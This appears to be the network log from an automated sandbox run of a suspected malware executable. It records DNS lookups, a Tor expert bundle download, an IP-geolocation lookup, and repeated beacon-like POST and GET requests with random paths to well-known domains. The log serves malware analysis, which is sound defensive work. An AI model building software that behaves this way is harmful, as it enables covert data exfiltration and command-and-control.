      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: close
    • flag-us
      DNS
      226.63.69.159.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.63.69.159.in-addr.arpa
      IN PTR
      Response
      226.63.69.159.in-addr.arpa
      IN PTR
      archive-01 torprojectorg
    • flag-us
      DNS
      226.63.69.159.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.63.69.159.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      98.29.16.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      98.29.16.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      98.29.16.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      98.29.16.104.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      47.166.228.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      47.166.228.91.in-addr.arpa
      IN PTR
      Response
      47.166.228.91.in-addr.arpa
      IN PTR
      skh1-webredir01-vesetcom
    • flag-us
      DNS
      47.166.228.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      47.166.228.91.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      98.30.16.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      98.30.16.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      98.30.16.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      98.30.16.104.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      121.77.117.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      121.77.117.104.in-addr.arpa
      IN PTR
      Response
      121.77.117.104.in-addr.arpa
      IN PTR
      a104-117-77-121deploystaticakamaitechnologiescom
    • flag-us
      DNS
      121.77.117.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      121.77.117.104.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      14.200.250.142.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.200.250.142.in-addr.arpa
      IN PTR
      Response
      14.200.250.142.in-addr.arpa
      IN PTR
      lhr48s29-in-f141e100net
    • flag-us
      DNS
      14.200.250.142.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.200.250.142.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      ip-api.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      DNS
      ip-api.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
    • flag-us
      DNS
      25.251.17.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      25.251.17.2.in-addr.arpa
      IN PTR
      Response
      25.251.17.2.in-addr.arpa
      IN PTR
      a2-17-251-25deploystaticakamaitechnologiescom
    • flag-de
      GET
      https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      159.69.63.226:443
      Request
      GET /tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz HTTP/1.1
      Host: archive.torproject.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Server: Apache
      X-Content-Type-Options: nosniff
      X-Frame-Options: sameorigin
      X-Xss-Protection: 1
      Referrer-Policy: no-referrer
      Strict-Transport-Security: max-age=15768000; preload
      Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      Last-Modified: Thu, 16 Mar 2023 15:33:36 GMT
      ETag: "d42801-5f7062f2cbbbf"
      Accept-Ranges: bytes
      Content-Length: 13903873
      Cache-Control: max-age=2592000
      Expires: Fri, 10 May 2024 02:30:02 GMT
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-gzip
      Content-Language: en
    • flag-us
      DNS
      openai.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      openai.com
      IN A
      Response
      openai.com
      IN A
      13.107.246.64
      openai.com
      IN A
      13.107.213.64
    • flag-us
      DNS
      blockchain.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      blockchain.com
      IN A
      Response
      blockchain.com
      IN A
      104.16.30.98
      blockchain.com
      IN A
      104.16.29.98
    • flag-us
      POST
      http://openai.com/ifMwwwu7Vx?q=1
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      POST /ifMwwwu7Vx?q=1 HTTP/1.1
      Host: openai.com
      Content-Length: 206
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/ifMwwwu7Vx?q=1
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004czu
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d05
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d08
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d0a
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d0k
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d0t
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023003Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d12
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023003Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d15
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://blockchain.com/ARmyOO9vJh?q=133
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:80
      Request
      GET /ARmyOO9vJh?q=133 HTTP/1.1
      Host: blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Wed, 10 Apr 2024 03:30:02 GMT
      Location: https://www.blockchain.com/ARmyOO9vJh?q=133
      X-Content-Type-Options: nosniff
      Set-Cookie: _cfuvid=LtqTMBtVM1qmjPIh7vIibQJ9cJyzW079L78YICk8laE-1712716202315-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly
      Server: cloudflare
      CF-RAY: 871f50084f2f640c-LHR
    • flag-us
      GET
      https://www.blockchain.com/ARmyOO9vJh?q=133
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:443
      Request
      GET /ARmyOO9vJh?q=133 HTTP/1.1
      Host: www.blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      content-security-policy: default-src *.blockchain.com; script-src 'self' 'unsafe-eval' https://cdn.polyfill.io https://www.facebook.com http://www.google-analytics.com https://www.google.com https://www.gstatic.com *.blockchain.com *.blockchain.info https://www.googletagmanager.com nonce-wF8xZix9kiBdsEWDv6lechyHIi5hBIeY data:; script-src-elem 'self' 'unsafe-inline' https://cdn.polyfill.io http://www.google-analytics.com https://www.googletagmanager.com https://analytics.twitter.com http://static.ads-twitter.com https://connect.facebook.net nonce-wF8xZix9kiBdsEWDv6lechyHIi5hBIeY; connect-src 'self' *.blockchain.com *.blockchain.info *.cryptocompare.com https://script.google.com https://webto.salesforce.com/* wss://streamer.cryptocompare.com https://blockchain.info https://api.greenhouse.io *.doubleclick.net *.google.com *.googleusercontent.com https://www.google-analytics.com https://cdn.embedly.com nonce-wF8xZix9kiBdsEWDv6lechyHIi5hBIeY; frame-src 'self' *.blockchain.com *.blockchain.info *.apple.com https://www.google.com https://www.youtube.com https://www.googletagmanager.com https://cdn.embedly.com https://dxmfp9dfv1uwi.cloudfront.net/; img-src 'self' *.blockchain.com *.blockchain.info *.medium.com https://www.googletagmanager.com *.adsrvr.org data: *.cryptocompare.com *.googleusercontent.com https://www.facebook.com http://www.google-analytics.com https://www.google.com http://t.co/i/adsct https://raw.githubusercontent.com *.medium.com; style-src 'self' 'unsafe-inline' https://rsms.me https://fonts.googleapis.com nonce-wF8xZix9kiBdsEWDv6lechyHIi5hBIeY; font-src 'self' https://rsms.me https://fonts.gstatic.com data:; manifest-src 'self'; object-src 'self'; media-src 'self' *.archive.org;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      vary: Accept-Encoding
      x-blockchain-cp-b: blockchain-com
      x-blockchain-cp-f: 273f 0.002 - 054465ea7ef23ca42b86595430f4cbe5
      x-blockchain-language: en
      x-blockchain-language-id: 0:0:0 (en:en:en)
      x-blockchain-server: BlockchainFE/1.0
      x-content-type-options: nosniff
      x-frame-options: SAMEORIGIN
      x-original-host: www.blockchain.com
      x-request-id: 054465ea7ef23ca42b86595430f4cbe5
      x-xss-protection: 1; mode=block
      CF-Cache-Status: HIT
      Age: 39
      Set-Cookie: _cfuvid=r9nlFMofdLZW_VcGUNmw2U7QSgr7biSnuqN3sBPA1GE-1712716202868-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 871f500bcf5d7302-LHR
    • flag-us
      POST
      https://openai.com/ifMwwwu7Vx?q=1
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      POST /ifMwwwu7Vx?q=1 HTTP/1.1
      Host: openai.com
      Content-Length: 206
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 405 Method Not Allowed
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Length: 0
      Connection: keep-alive
      Allow: GET, HEAD, OPTIONS
      x-azure-ref: 20240410T023002Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037fw
      X-Cache: TCP_MISS
      cache-control: no-cache
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023002Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037fy
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037fz
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037g0
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037g1
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037g3
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      DNS
      youtube.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      youtube.com
      IN A
      Response
      youtube.com
      IN A
      216.58.204.78
    • flag-gb
      GET
      http://youtube.com/YggOLR313W?q=26
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      216.58.204.78:80
      Request
      GET /YggOLR313W?q=26 HTTP/1.1
      Host: youtube.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: application/binary
      X-Content-Type-Options: nosniff
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Location: https://youtube.com/YggOLR313W?q=26
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
    • flag-sk
      POST
      http://eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      91.228.166.47:80
      Request
      POST /No0TnWnOx1?q=0 HTTP/1.1
      Host: eset.com
      Content-Length: 152
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Wed, 10 Apr 2024 02:30:01 GMT
      Content-Type: text/html
      Content-Length: 178
      Connection: close
      Location: https://www.eset.com/No0TnWnOx1?q=0
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9c2ptd7c8q2exvv500000000440000000004bgk
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
